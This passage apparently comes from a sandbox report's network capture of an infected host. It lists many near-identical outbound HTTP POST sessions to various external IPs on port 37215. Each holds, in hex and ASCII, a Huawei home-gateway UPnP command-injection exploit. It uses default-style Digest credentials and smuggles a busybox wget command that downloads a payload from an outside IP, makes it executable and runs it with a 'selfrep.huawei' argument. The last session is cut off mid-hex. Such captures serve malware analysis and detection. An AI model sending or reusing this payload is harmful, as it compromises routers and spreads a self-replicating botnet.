                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2335192.168.2.1358962197.201.12.17937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.784648895 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2336192.168.2.133848450.57.181.15937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.784676075 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2337192.168.2.1360758184.14.103.24137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.784691095 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2338192.168.2.135425441.236.107.24337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.784704924 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2339192.168.2.134021247.130.194.937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.784720898 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2340192.168.2.1347290212.209.122.4637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.784743071 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2341192.168.2.1357446197.2.110.6137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.784765005 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2342192.168.2.133332441.185.13.437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.784780979 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2343192.168.2.134087485.140.255.5837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.784817934 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2344192.168.2.134065252.56.202.8337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.784817934 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 